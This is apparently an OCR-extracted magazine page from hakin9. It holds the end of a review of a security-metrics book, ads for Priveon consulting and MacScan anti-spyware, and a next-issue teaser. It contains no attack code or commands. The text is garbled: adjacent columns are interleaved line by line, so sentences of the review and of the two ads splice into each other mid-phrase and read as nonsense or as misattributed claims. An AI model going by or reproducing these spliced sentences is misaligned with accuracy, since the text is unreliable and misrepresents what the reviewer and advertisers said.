other chapters were very highly informative but I found myself – what management would like/expects to see. Overall, for
skimming through those. It will be a difficult call to disagree the security manager or CSO, this book is for you. For the
with his methodology yet one can fiddle with numbers as one security engineers, white and grey hats, let's hope the next
sees fit and distort outcomes as one sees fit as well. Those author chooses a realistic name.
who enjoy risk management are better suited to this book so
if I could, I'd rename it to something like Security Risk Metrics by Jesus Oquendo
bcausey@zerodayconsulting.com www.digitalarmaments.com
Priveon MacScan
Priveon offers complete security lifecycle se- MacScan detects, isolates and removes spy-
rvices – Consulting, Implementation, Support, ware from the Macintosh.
Audit and Training. Through extensive field Clean up Internet clutter, now detects over
experience of our expert staff we maintain a 8000 blacklisted cookies.
positive reinforcement loop between practices Download your free trial from:
to provide our customers with the latest infor- http://macscan.securemac.com/
mation and services.
http://www.priveon.com
http://blog.priveonlabs.com/ e-mail: macsec@securemac.com
EXCLUSIVE&PRO CLUB
The main subject of next issue of hakin9 will be:
Also inside:
hakin9 is a bi-monthly. It means 6 issues of hakin9 a year! Each edition is full of precious
guidelines, useful hints and essential information necessary to be even more knowledgeable
and efficient in securing your systems.